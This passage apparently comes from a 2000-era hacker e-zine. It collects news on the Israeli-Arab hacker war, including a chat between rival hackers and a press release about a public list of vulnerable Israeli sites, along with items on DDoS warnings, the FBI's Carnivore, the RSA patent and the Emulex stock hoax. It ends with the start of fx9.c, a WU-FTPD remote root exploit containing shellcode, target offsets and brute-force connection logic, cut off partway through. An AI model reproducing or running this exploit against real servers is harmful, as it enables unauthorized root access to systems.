But Bouzaglo dreams of becoming a politician for Israel's right-wing Likud party. Putting on a pressed shirt and dark tie, he took to the airwaves everywhere, from Israel radio and television to CNN. He since has become something of a celebrity and recently spoke before an Internet committee in the Knesset. In the glare of the media spotlight, Bouzaglo has flip-flopped in classic politician style. He's now calling on his comrades to stop attacking Arab sites, but that doesn't mean he's showing any regret for the hacks that brought him attention. "The Net has a lot of power," Bouzaglo says, adding that he was spurred to action after a Palestinian mob lynched two Israeli soldiers early in the conflict. "Millions of visitors from around the world are entering these sites to see Israel as the bad guy." Middle East hackers often struggle to overcome a bad-guy image. Bouzaglo and m0nk3y of Arab might take opposite sides on politics, but both reject the label of cyberterrorist, preferring to see themselves as rebels with a cause. As the computer war shows, the Internet has empowered a generation of hackers armed with nothing more than Web access to challenge the online world. It doesn't take much. According to one Israeli familiar with his work, Bouzaglo isn't a top-tier hacker. He didn't serve in the Israeli army's crack computer unit, where many Israeli computer experts cut their teeth. Instead, his service as a firefighter in Israel, where fires are few and far between, left him with plenty of time to tinker on his laptop and teach himself Java and HTML. Since his release from the army in September, Bouzaglo has spent much of his time operating a Web site geared toward stopping violence in Israeli society. He also teaches computer classes at an elementary school and occasionally indulges in some hacking from his parents' apartment in Holon, just south of Tel Aviv. 
The speed and potency of the Arab hackers' retaliation for cyberattacks have prompted Bouzaglo to disavow his hacking ways. "These attacks are pointless," he says. "It's just a virtual war game." Still, Bouzaglo does not rule out cooperating with Israeli authorities to devise more-sophisticated and surreptitious tactics to attack its enemies via the Web. So it was no surprise that pleas to his Arab adversary to end the hostilities sparked suspicion. Hackers on all sides know that once a cyberwar spreads it can be tough to control. Arab hackers like m0nk3y of Arab relish the opportunity to fight Israelis on the Internet. They see it as a level playing field, in contrast to the conflict on the ground, in which they believe Israel is using grossly disproportionate force. "What we are doing now is a fair war," m0nk3y of Arab states in e-mail correspondence. "Brains vs. brains." Brains on both sides quickly learned that Israel is particularly vulnerable to electronic warfare. Israel might be more wired than Arab countries, but it also has relatively small pipes that connect the country to the rest of the Internet, making it susceptible to attacks at choke points. "We all know that Israeli high-tech companies have a world-class reputation, but this does not mean that we are weak or useless," m0nk3y of Arab states. Bouzaglo agrees that Israel's networks are vulnerable. "In this war," he says, "the Arab hackers will win." Press:http://www.thestandard.com/article/article_print/0,1153,20102,00.html November 09, 2000 A Virtual Olive Branch In a chat session arranged especially for The Standard, an Israeli hacker asks his two Arab counterparts for a truce in the Mideast cyberwar. By Industry Standard Staff JERUSALEM – As clashes raged between Israelis and Palestinians on the first night of November, tentative talks were taking place deep in cyberspace among three participants in a virtual war that has flared up alongside the Middle East crisis. 
The prospect of meeting the enemy and the opportunity to sound off persuaded two Arab hackers and one Israeli hacker to face off in a chat session arranged exclusively for The Standard. Participating were Mikael (Miki) Bouzaglo, a 22-year-old Israeli hacker with political ambitions; m0nk3y of Arab, 23, a mysterious hacker from somewhere in the Middle East; and Sammy, a 26-year-old U.S.-based Arab hacker. All claim to have played some role in the recent spate of attacks and counterattacks on Arab and Israeli servers.

Following are excerpts of their chat session, which was moderated by The Standard. The excerpts have been edited for clarity.

What began as a surprisingly cordial exchange led to Israeli pleas for a cybertruce, shifting at times into the emotional and sometimes militant politics that have characterized the Middle East peace process for decades. Although the dialogue is choppy at times, it provides a rare glimpse into how the Net can be used as both a weapon and as a medium for fostering communication between the most bitter of enemies.

Avi: Do you guys have any respect, as hackers, for what you've been doing to each other?
Miki: Yes.
Miki: I respect him.
m0nk3y of Arab: I always respect my enemy, whoever he is.
Sammy: Hmmm.
Miki: Because first of all, he is a person.

Both sides were asked to briefly provide details of their regional hacking experiences before the latest wave of violence in the Middle East crisis erupted. The Arabs were much more guarded than Bouzaglo.

Avi: Did you guys attack Israeli sites before?
Sammy: Probably.
m0nk3y of Arab: Sites? No. Machines? Yes.
Avi: Servers, you mean?
m0nk3y of Arab: You can say that.
Avi: Miki: What about you?
Miki: In the past, I hacked some sites in Lebanon.
m0nk3y of Arab: Can you define which sites?
Miki: almanar mokowama atc. almanar.com.lb
m0nk3y of Arab: Got it.
Miki: And more propaganda sites that call to "Kill the Israeli."

Politics snuck into the next round of dialogue – but were quickly snuffed out – when participants were asked whether they consider themselves part of global hacker culture, or a breed apart, since they are ideologically driven.

Avi: Do you feel like you fit into the general hacker scene or is it different?
Sammy: Yes, but with ethics. For a good cause.
m0nk3y of Arab: Agree.
Avi: Which in this case is?
Sammy: The sick propaganda.
Miki: But Monkey, don't you think that the Palestinians started this war?
Miki: Believe me, we want peace. But it's not easy.
Sammy: Let's not get into politics, please.

Bouzaglo then jumps into his main message for the evening, pleading with his Arab counterparts to halt the online hostilities.

Miki: May I ask you something, Monkey?
m0nk3y of Arab: Do.
Miki: Will you continue to attack the Netvision servers? Or do you think that we need to change tactics?
m0nk3y of Arab: If I stop, my mates will continue till all Palestinians get their rights. It's not my decision only, miki ... We are a team.
Miki: But I will tell you something. I stopped it, I stopped the attacks.

Both sides have said their main motivation for attacking has been to silence propaganda on the other side. But in a wired world, people can always find alternative ways of getting the same information.

Avi: Isn't it kind of futile to spend all your time on this?
Miki: This is why I changed tactics. I spoke on TV and radio to stop all the attacking.
m0nk3y of Arab: Right, but [the attacks] make it more difficult for normal people to find the other point of view.

Miki goes back to his cease-fire appeal.

Miki: Can you say to me that you are going to stop the virtual war?
Sammy: I thought we haven't started yet?
m0nk3y of Arab: LOL [laugh out loud] Sammy.
Sammy: No, for real.
Miki: We also can do a lot of damage on the Lebanon sites and servers but … It's not OK and right to do it.
m0nk3y of Arab: Lebanese servers are not the only Arab servers, miki.
Miki: I know, there's a lot in the U.S.
m0nk3y of Arab: If you stop attacks from Lebanon, you will find a lot from others.
Sammy: Anyhow, no hacker in his right mind would do this for fun, there is an important cause that arose recently. We didn't start this, we didn't start the war in Palestine.
m0nk3y of Arab: As I said, what we did is a reaction to what's happening.
Sammy: I wish for every Arab to look deep inside of him and do what is right … an eye for an eye.
Miki: So I see that you want to continue this war?
Sammy: This is a small part of a big world.
m0nk3y of Arab: Miki, do you think you can control this cyberwar?
Miki: No, you and not me can stop it because we are not [responsible for] all the hacking.
m0nk3y of Arab: Exactly right.

Raw emotions come to the fore.

m0nk3y of Arab: Miki, can you give us a general background what you were doing during your military service? Were you hitting Palestinians?
Miki: No, I didn't. But, dear friend, don't think that we are the bad guys.
m0nk3y of Arab: I didn't say that. What do you feel if you see an Israeli soldier enjoying killing a Palestinian?
Miki: We can't stop this war, but we can put it down.
m0nk3y of Arab: How, miki? Explain.
Miki: Believe me. For the Palestinians it's their independence war. You see, Sammy, how could anyone shoot a kid and have a smile on his face?
Sammy: Have you been watching the news? Pictures.
Miki: Tell me, did you see the crowd of Arabs from Ramallah [in the West Bank] lynching 2 Israeli soldiers?
Miki: Yes.
Sammy: Do you remember Hitler?
Miki: Yes, I do.
Sammy: Arabs feel the same about the Jews.
m0nk3y of Arab: Soldiers are different than unarmed civilians.
Miki: Why do you dislike the Israelis?
m0nk3y of Arab: I hate their actions, not them personally.
Sammy: Mass killings of innocent kids is shameful and disgusting.
Miki: So you think that if you hack some Israeli sites you will fix the problem?
Miki: We need to talk.
Sammy: Talk talk talk! We've done sooo much talking and no action.

Realizing he will not persuade his adversaries to call off the hacker war, Bouzaglo tries another tactic. Somewhat naively, he tries to find out if his chat partners have any information about three Israeli soldiers who were kidnapped last month by Hezbollah, the Lebanese guerrilla movement. M0nk3y appears to misunderstand and thinks Bouzaglo is trying to argue that the kidnappings justify Israel's actions against Palestinians.

Miki: Do you know something about the 3 Israeli soldiers?
m0nk3y of Arab: They are soldiers, not civilians, miki.
m0nk3y of Arab: I don't enjoy shooting kids.
Miki: Please, do you know something about it?
m0nk3y of Arab: No, miki.
Miki: So, dear Monkey, can you get info about it?
m0nk3y of Arab: Don't take it personally, miki.

Israeli Underground Press release:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*** IMPORTANT NET SECURITY PRESS RELEASE ***

To your attention:

According to Wired News, CNN, Cnet and other reliable sources, phase three and four of the Israeli-Arab cyber war has begun. That means, attacks on the Israeli Internet infrastructure and the intrusion into Israeli e-commerce sites are the next step in what we experienced lately as cyber vandalism.

With this information, and additional insider information, which sites are going to be attacked in the near future, IIU, the Israeli Internet Underground, decided to set up the "SODA" Project. With this project they want to warn about the coming danger and to announce publicly all endangered Israeli sites. The "SODA" Project mainly consists of a list on a public web site, that lists all the Israeli websites which bear security vulnerabilities and are likely to be broken into by Islamic groups in the near future.

IIU addressed 2xs Ltd. in the hope of finding a company that is willing to support their non-profit project and to provide it with solutions. 2xs Ltd. agreed to provide consulting and solutions free of charge for a certain time, and is also trying to motivate other Israeli security companies to take part in this project and to offer "first-aid" solutions to all the endangered sites, free of charge as well.

IIU sees that Israeli Internet security is seriously endangered and that precaution must be undertaken very fast. This is a call for everybody to have a close look at the security situation of the Israeli Internet and to act. 2xs Ltd. is asking you to publish this information and to help us motivate the Internet community and security companies in Israel, to provide help where necessary.

Also, not only single sites are endangered, but the planned and upcoming attacks might have a serious impact on the Israeli economy, therefore concerning all of us.

We thank you in advance for seriously looking into this matter.

Further info:

To whom it may concern,

I'm forwarding you a message of the "IIU", a non-profit security group from Israel who have contacted me. I'm sending this on to you since they would like to stay anonymous. As a response to the recent attacks against sites in Israel, they've put up a page with vulnerability information about hosts in Israel at www.iiu.org.il in an attempt to stop the ongoing attacks, to generate security awareness and to let companies look up their host to see if they need to apply more security measures to their sites.

Mixter

---------- Forwarded message ----------
Date: Thu, 8 Nov 2000 21:03:06 +0200 (IST)
To: mixter@newyorkoffice.com
Subject: Important

I'm writing you on behalf of the Israeli Internet Underground. We are a group of "white-hats" (ethical hackers) determined to protect the Israeli internet from attacks from malicious groups in the name of the Israeli spirit. As you may know, many sites and service providers in Israel are suffering from cyber attacks by certain anti-Israel groups of malicious hackers. We have reason to believe that attacks are shifting from Denial Of Service attacks to server break-ins and attempted compromise of resources such as e-commerce sites and large institutions, and this is going to get worse very soon.

IIU is putting all its effort into drastically improving security for Israeli sites, and increasing the security awareness. Therefore, IIU has contributed all its resources and information about the security problems in the infrastructure of the Internet sites in Israel, and together with a local security company, 2XS Ltd., we generated a comprehensive list of sites and networks in Israel which are vulnerable to and could fall victim to digital break-ins, and a separate report with descriptions and security fixes for each site. We are providing this list under the following URL: http://www.iiu.org.il

We sincerely hope you understand the importance of this project and that you will support us in generating awareness among Israel's Internet community by forwarding this mail, spreading the word about this resource, and adding a link or a banner to our site.

Please do not hesitate to contact us regarding any questions you might have. Of course, we have taken appropriate steps to protect this critical information from misuse. We are providing names and network ranges of every vulnerable site in Israel, which can be browsed on the site.

With thanks and regards,
The Israeli Internet Underground

@HWA

343.0 [IND] NOCPulse and ISS warn of impending DDoS attacks this Christmas
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS' Web site is at http://www.iss.net . NOCpulse's Web site is at http://www.nocpulse.com .
Reported by Newsbytes.com, http://www.newsbytes.com

Byline: Denial of Service Attacks Planned For Christmas - ISS
By Steve Gold, Newsbytes
ATLANTA, GEORGIA, U.S.A., 17 Nov 2000, 12:35 PM CST

X-Force, the research and development (R&D) team of Internet Security Systems [NASDAQ:ISSX] (ISS), has warned that hackers are planning an online attack-fest this coming Christmas.

The attacks, if they occur, will take the form of distributed denial of service (DDOS) invasions, a hacker flooding technique used earlier this year - and since - to effectively flood out a major Web site and prevent normal users from gaining access, ISS said.

The technique was used in February of this year when Amazon, Buy.com, CNN Interactive, eBay and a number of other high-profile sites were downed by hackers, apparently using DDOS applications known as "Trinoo," "Stacheldraht" and "TFN2K."

ISS was one of the first IT security companies to issue an advisory over DDOS attacks back in early February, warning Web site managers to be aware that the offending applications could bring down an enterprise network or e-commerce site by flooding it with large amounts of traffic.

In addition, the firm advised that, while there is little that sites can do to prevent such attacks, companies can take steps to ease the pain, including assembling an incident response team, tapping resources from the organization's Internet service provider (ISP) and the computer emergency response team (CERT) advisory team.

ISS has also advised organizations to establish links with local law enforcement authorities, so that, if an attack occurs, the appropriate people can be notified quickly.

A spokesperson for ISS told Newsbytes that the firm has detected a definite pattern amongst DDOS attacks and, coupled with its knowledge of the hacker community, is warning major sites to be on alert for attacks this Christmas.

The need for preparation amongst major Web site operators is great, the company says; only 10 percent of Web sites with e-commerce operations have preparations in place.

In parallel with its warning of impending DDOS attacks this Christmas, ISS has teamed up with NOCpulse, a newly launched provider of outsourced Internet infrastructure management services, to deliver managed security services to customers.

As an emerging services provider, NOCpulse plans to add ISS' managed security service offerings and operational expertise to major customers. As a result, ISS says that NOCpulse customers will have access to key managed security services offerings as well as top notch security expertise.

Mark Hangen, ISS' general manager of managed security services, said that NOCpulse represents a new breed of managed service provider (MSP) that can give companies the information they need to proactively manage their Internet infrastructure.

Paul Santinelli, NOCpulse's founder and president, meanwhile, said that the NOCpulse command center is the first Internet operational support service (IOSS) designed to give customers full control over their Internet infrastructure.

12:35 CST (20001117/Press Contact: David Bridson, ISS +44-20-7626-7070; Michell Norwood, ISS 678-443-6000 /WIRES TOP, ONLINE, LEGAL, PC/DOTCOMATTACK/PHOTO)

-=-

http://www.nocpulse.com/

About NOCpulse

NOCpulse is an Internet Operational Support Service company that provides the strategy, systems and information that businesses need to proactively manage their Internet infrastructure.

How We Started

Industry veterans from organizations including Excite@Home and Global Crossing (formerly GlobalCenter) founded NOCpulse in April 2000.

Market Need

Faced with the twin challenges of managing Internet operations while scaling for the future, web-critical businesses are quickly overwhelmed by the intense need for both human and capital resources. NOCpulse alleviates this pressure by offering an outsourced Web infrastructure management service, putting proactive control back in the hands of IT staff.

The NOCpulse Command Center(SM)

The NOCpulse Command Center is the industry's first Internet Operational Support Service (IOSS), empowering businesses with total control over their Internet infrastructure. By deploying the NOCpulse Command Center, a company will dramatically reduce the total cost associated with the operation of web environments and gain the intelligence to grow proactively and optimize its operations. Outsourcing Internet management operations through NOCpulse will allow companies to more efficiently deploy their human capital investments while sharpening their awareness of system operations. IT personnel can re-focus on delivering real value to the core business competencies of a company.

The NORAD of the Internet

Deep within Cheyenne Mountain, Colorado, the NORAD command and control center serves as a central collection and coordination facility for a worldwide system of sensors designed to provide an accurate picture of US and Canadian airspace. Like NORAD, NOCpulse serves and protects its customers through superior information used to watch, respond and protect their Internet infrastructure.

Management

Executive
  Paul Santinelli, President and Founder
  Steve Springsteel, Chief Financial Officer
  Jon Prall, Sr. VP, Technology
  Dan Nater, VP, Operations
  Jim Gerber, VP, Sales
  Dave Parker, Principal Engineer

Board of Directors
  Paul Santinelli, President and Founder
  David Sze, General Partner, Greylock
  Angelo Santinelli, General Partner, North Bridge Venture Partners

Board Observers
  David Strohm, General Partner, Greylock
  Richard D'Amore, General Partner, North Bridge Venture Partners

Funding
  Series A, April 2000: $12 Million, Greylock and North Bridge Venture Partners

Contact Info:
  NOCpulse, Inc.
  1293 Mountain View Alviso Road, Suite D
  Sunnyvale, CA 94089
  (408) 542-2800
  www.nocpulse.com
  info@nocpulse.com

344.0 [IND] Oct 2000: Carnivore does more than previously thought
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.theregister.co.uk/content/1/13767.html

Carnivore does more than previously thought
By: Thomas C Greene in Washington
Posted: 05/10/2000 at 14:49 GMT

Heavily censored FBI documents obtained by US watchdog outfit the Electronic Privacy Information Centre (EPIC), under a Freedom of Information Act (FOIA) lawsuit, indicate that the FBI's electronic snoop known as Carnivore might be able to monitor a good deal more than just e-mail traffic.

Among the capabilities that peek out from behind all the indelible black swaths in the documents is an ability to reconstruct an entire Web page as viewed by a subject. A planned, updated version may even be able to capture voice-over-Web communications.

Presently the system can capture and record all packet traffic to and from a selected IP, while monitoring a subject's on-line movements.

These extra capabilities underscore the controversial issue of FBI reliability in restraining itself when authorised to view only e-mail headers. This is a crucial point, because the Bureau can obtain the on-line equivalent of a pen register order (recording the destinations of out-going communications) or a trap and trace order (recording the origins of in-coming communications) without a warrant signed by a judge.
Because of the lower standard, the contents of such communications must not be intercepted. For such limited surveillance the standard of evidence is quite low: the FBI need merely be prepared to prove that the information sought could be material to an investigation.

To snoop on the actual content communicated - the on-line equivalent of a telephone wiretap - the FBI must satisfy a judge that a crime is likely to be committed. Some judges hand out wiretap orders as if they were parking tickets; others will laugh one out of chambers for producing less than a smoking gun in evidence. The system is far from perfect, but on balance it does a tolerable job of keeping most of the Feds at an appropriate distance most of the time.

But many fear that the FBI could broaden its on-line snooping under limited surveillance orders, succumbing to temptation provided by Carnivore's additional capabilities. Suppose, for example, that FBI agents were to obtain a pen register and/or trap and trace order for a subject, but then go a bit further on their own. Would anyone be the wiser?

And what becomes of information collected illegally? It's useless in court, being the poisonous fruit of a forbidden tree. But suppose it were sufficient to tip off the Feds to a criminal act for which they could later obtain evidence legitimately. They wouldn't have known about it if they hadn't broken the law, but they'll build a case in court based on evidence gathered legitimately. Would anyone be the wiser?

One possible solution to these concerns would be for the FBI to develop a bare-bones version of Carnivore, capable of intercepting nothing more than e-mail headers, to be used for the on-line equivalent of trap and trace and pen register orders. Thus the full-scale Carnivore with its additional capabilities would be authorised for use only when a wiretap order had been issued by a judge.

This wouldn't be a guarantee against abuse of limited snooping authority, but it would add an extra layer of protection for subjects, and a bit more credibility to FBI claims of conscientious self-regulation. Abuse would require a wider circle of cooperation, and so increase the likelihood that an overzealous agent would be caught with his hand in the cookie jar by a supervisor. ®

@HWA

345.0 [IND] Surprise! RSA releases crypto patent ahead of schedule
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zdnet.com/eweek/stories/general/0,11011,2624678,00.html

Surprise! RSA releases crypto patent ahead of schedule
By Scott Berinato, eWEEK
September 6, 2000 11:19 AM ET

RSA Security Inc. today pulled the tablecloth from underneath its competitors' plates, releasing its cryptographic algorithm into the public domain two weeks early.

The patent on RSA's crypto technology, which is widely employed in the security realm, would have expired September 20, exactly 17 years after the patent was issued to the Massachusetts Institute of Technology and licensed exclusively to RSA. The 20th has been widely considered a watershed date, circled on the calendars of many security company executives. Some companies, like Baltimore Technologies Inc., were using the expiration of the patent as a springboard for new products and marketing campaigns.

RSA CEO Art Coviello told eWEEK that the company wanted to get this milestone out of the way because it was garnering too much attention and confusing customers.

"Someone asked me if I had thought about extending the patent, and that's the thing," Coviello said. "The idea of extending the patent hadn't even occurred to us because it's just not part of our business. Why would we not want this to be the de facto standard in the public domain? So now it's out there."
Coviello also said that the expiration of patent number 4,405,829 hasn't affected the company's strategic direction, which appears to remain focused on technology. While other companies are hurriedly extending into managed security services, RSA wants to remain a company entrenched in code.

"We're not schizophrenic," Coviello said. "We know who we are. We won't try to be something we're not. I don't think you can execute on a managed services model and a product model at the same time."

@HWA

346.0 [IND] Hackers: The millennial scapegoats?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.theregister.co.uk/content/6/12010.html?&_ref=233393570

Hackers: The millennial scapegoats?
By: Kieren McCarthy
Posted: 18/07/2000 at 15:59 GMT

The leak of a confidential memo outlining PM Tony Blair's concerns that New Labour is out of touch with the electorate appears to have been pinned on hackers.

The leak came as an embarrassment to the government, especially considering recent criticism of its policies. After the memo came to light, papers were quick to point out the significance of it only being sent to close confidants of the prime minister. Who is the mole? was the question posed by many editorials.

However, after a day's reflection, a different explanation from the traditional frustrated-minister-leak has taken hold. Number 10, the theory holds, has been hacked and this explains not only this leak but other embarrassing revelations that have come out in recent months.

This is an extremely tough call to make. On the one hand, this explanation is a near-perfect political answer to a nasty situation. On the other, it's all too plausible.

Faced with the situation, and assuming it was a leak by a senior government source, this hacker theory has enormous political advantages. It is already in the public domain, so damage limitation is the order of the day. The hacker story will pull media attention off its search for who leaked the material and push it towards computer security concerns. Aside from lifting scrutiny and pressure on the party, it also produces a smokescreen behind which Labourites can try to find who actually released the information.

Building on the idea that it has been hacked will also provide the government with a certain degree of sympathy - most people have had their privacy invaded at some point and know that reality is often very different from the perceived truth. On top of this, this whole situation elevates the issue of computer security and thus Internet technology and the digital world. It's what's called making the best of what you've got.

But then, of course, it may be a hack job. Whitehall has been pushing through some fairly hefty IT projects recently in its bid to make the government totally Internet-enabled by 2005. When things go this fast, it only needs one civil servant with an astute IT knowledge to find a hole in the system. Once that hole is found, and with people rushing ahead with other projects, it is not inconceivable that you could gain and fortify a foothold in the government's IT system. A very useful foothold to have.

The recent defacing of the Cabinet Office Web site also points to the fact that Downing Street has been targeted by hackers. "Senior sources" have also pointed out that recent leaks have had one thing in common: they have been sent via email.

What's the truth of this? Well, we would apply the if-it-sounds-too-perfect-it-ain't-true rule. In this case, we don't believe a word of it.

Getting cynical for a moment, it is not even inconceivable that this is an intentional leak. If you look at it, the memo basically says that Tony Blair actually has his finger on the UK's pulse by, er... not having his finger on the pulse. He is seen to be answering the press' concerns, he is concerned about the British public blah blah blah.

So what is actually going on? We really couldn't tell you. But whatever story you believe, it does demonstrate one thing: that the government has become far more tech-savvy than at any time in the past. As ever, this will have negative and positive effects on the UK's democracy. ®

@HWA

347.0 [IND] Student Arrested in Emulex Hoax Case
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.zdtv.com/zdtv/zdtvnews/politicsandlaw/story/0,3685,9239,00.html

Student Arrested in Emulex Hoax Case
By Maria Godoy, TechTV News
August 31, 2000

FBI officials today arrested a 23-year-old Southern California student in connection with a fake press release that triggered a 50 percent plunge last Friday in the stock price of technology company Emulex.

Mark Simeon Jakob, a resident of El Segundo, California, was taken to a Los Angeles County courthouse around 11 a.m. Pacific Thursday and charged with multiple felonies, including wire fraud, acting with intent to defraud, participating in a scheme to defraud, and securities fraud. He faces a maximum penalty of 15 years in prison.

Until August 18, Jakob had been an employee of Internet Newswire, the Web-based corporate news service that distributed the bogus press release, and he knew how to navigate its system to get a hoax release through, authorities said.

"The suspect, we believe, realized about a quarter of a million dollars in profits from trades he made around the time of the fake press release," Mrozek said.

The fake Emulex press release said the company was restating its earnings, was under investigation by the Securities and Exchange Commission, and that its chief executive had quit.

FBI agents traced the bogus release to an email sent last Thursday night from a computer in the library of El Camino Community College, where Jakob is a student. Thom Mrozek, a spokesman for the US attorney's office in Los Angeles, said Jakob was seen using a PC in the school library that night.
Last Friday, investors reacting to the hoax release began frantically selling off shares in Emulex, which lost about $2.5 billion in value in a matter of hours. After Nasdaq halted trading in the stock, and the company said the information was false, shares recovered nearly all the losses.

Short-selling scam gone wrong

According to authorities, Jakob staged the press release hoax in order to avoid heavy losses from a short-selling scam gone wrong.

Investors who sell stock "short" borrow shares from a financial institution, betting that the price will fall at some future date. The shares are later replaced at a lower price, and the trader pockets the difference.

Jakob allegedly shorted more than 3,000 Emulex shares two weeks ago, selling them at between $72 to $92 a share. However, Emulex share prices did not drop as Jakob had expected, climbing instead to more than $100 by late last week.

To avoid potentially steep losses, Jakob manipulated the stock price to plummet. He replaced his borrowed shares at the lower price, reaping a profit of more than $50,000. As Emulex stock continued to plunge, Jakob bought up more shares, selling them three days after the stock price had recovered for a $186,000 profit.

This is not the first time a fake press release has been used to influence a company's stock. In 1999, Gary Hoke of North Carolina was fined $93,000 and sentenced to five years probation after he falsely reported that PairGain Technologies was about to be sold to an Israeli company.

@HWA

348.0 [EXP] fx9.c WuFTPD < 2.6.1 exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/*
 * THIS IS PRIVATE!! DO NOT DISTRIBUTE!! VERY MUCH PRIVATE!!
 *
 * fx - BETA9 - WU-FTPD REMOTE ROOT EXPLOIT
 * Exploits the format bug on the call SITE EXEC in wu-ftpd < 2.6.1
 *
 * Greets to: All spanish coders in the dark :)
 *
 * The Dark Raver
 * (23/08/2000 - Spain)
 *
 * Tired of trying other wu-ftpd exploits and they dont work??
 * Tired of waiting for very slow ways of exploiting??
 * Tired of using exact offsets that never works??
 *
 * This is your exploit!!!! It tests differents aligns, lengths, sizes
 * and offsets until it found the shell.
 *
 * Usage: fx9 [offset] [eat] [align] [address] [-d] [-f]
 *   [offset]  -> The position of the stack where is stored some eip
 *   [eat]     -> The number of %.f used
 *   [address] -> The address in memory of our shellcode, can be stack or heap
 *   [-d]      -> Use debug, more output and control over the calculation process
 *   [-f]      -> Force values, dont test if values are correct
 *
 * The code sucks, but work 90% of times on 90% of vulnerable wu-ftpd for
 * linux. Just play with the values.
 *
 * Example:                                Offset     Ret        Eat-Align
 * SuSe 6.3 wuftpd.rpm 2.6.0-20            0xbfffae68 0xbffffd9b 137-2
 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm     0xbfffd074 0xbfffdd14 137-2
 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm     0xbfffae68 0xbffffd9b 137-2
 * SuSe 6.3 wuftpd.rpm 2.6.0-20            0xbfffce94 0xbfffd6d4 137-2
 * Caldera 1.1 wu-2.4.2-academ[BETA-15](1) 0xbfffec14 0xbffffee0 5-2
 * SuSe 5.1 wuftpd-2.4.2beta15-5           0xbfffeafc 0xbffffdf8 5-2
 * ?? wu-2.4(1)                            0x???????? 0x???????? 5-6
 * ?? wu-2.4(4)                            0xbffff0dc 0xbffffe14 5-2
 * RedHat 5.0 wu-ftpd-2.4.2b15-5           0xbfffef28 0xbffffdf4 5-2
 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm     0xbfffae68 0x8075a10  137-2
 * RedHat 6.2 wu-ftpd-2.6.0-3.i386.rpm     0xbfffae68 0x8076cb0  137-2
 *
 *
 * !!NOTE!! Dont use offsets with the chars 0x00 (dont be lamer! ;)
 *
 * !!NOTE!! wu-ftpd converts to lowercase so most 0x41-0x5A will be converted
 *          to another values.
 *
 * !!NOTE!! The shellcode and some strings printed in the screen can corrupt
 *          your terminal simply ^Z, reset and fg.
 *
 * For Omnis, the best and the impossible one:
 *
 *   "Today the earth and the heavens smile at me,
 *    Today the sun reaches the depths of my soul,
 *    Today I have seen her... I have seen her and she has looked at me...
 *    Today I believe in God!"
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

int debug=0;   // change this if you want output
int force=1;

#define EAT    137
#define TOEIP  0xbfffae68
#define ALIN   2
#define RETN   0xbffffd9b
#define BUFLEN 1024
#define BIGBUF 10000
#define INICIO 0x245

void conectar(char *host);
void term(void);
void mkcode1(void);
void mkbuf(void);
void mkini(void);
void mkalin(void);
void mksh(void);
void status(void);

char code1[40];   // nops + suid + break chroot + sh
char code2[]=
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x4f\x31\xc0\x31\xc9\x5e\x88"
"\x46\x07\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed\xcd\x80\x31\xc0\x8d"
"\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1\xd0\xff\xff\xf7\xdb"
"\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03\xe0\xf9\x5e\xb0"
"\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x89\x76\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xac\xff\xff\xff\xff"
"\xff\xff/bin/sh";
char code3[8];

// Global variables rulez!!! ;)
int alin=ALIN;
int eat=EAT;
unsigned int toeip=TOEIP;
unsigned int retn=RETN;
char buf[BUFLEN];
int inicio=INICIO;
int opt=1;
int sock;
struct sockaddr_in sa;
struct hostent *hp;

int main(int argc, char *argv[])
{
    char mbuf[BIGBUF];
    int c;
    char *str;

    while ((c = getopt(argc,argv,"df"))!= -1){
        switch (c) {
        case 'd':
            printf("Debug active\n");
            debug=1;
            break;
        case 'f':
            printf("Forcing values\n");
            force=0;
            break;
        }
    }
    argc -= optind;
    argv += optind;
    //printf("%i\n", argc);

    if(argc!=5) {
        fprintf(stderr,"Usage: fx [offset] [eat] [align] [address] [-d] [-f]\n");
        if(argc==1) {
            printf("Using default values: offset=%x eat=%i align=%i add=%x\n",
                   toeip, eat, alin, retn);
        } else {
            exit(0);
        }
    }

    printf("1. Connecting...\n");
    if(debug) getchar();
    conectar(argv[0]);

    printf("2. Calculating eat...\n");
    if(debug) getchar();
    if(argc>=3) {
        sscanf(argv[2], "%i", &eat);
    } else {
        eat=EAT;
    }

    // The real spaghetti coding!!! ;)
    if(force) {
        eat--;
        do {
            eat++;
            memset(code1,0x30,40);
            mkalin();
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[9]='\x00';
            printf("Using eat: %i\n", eat);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|30303030",9))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
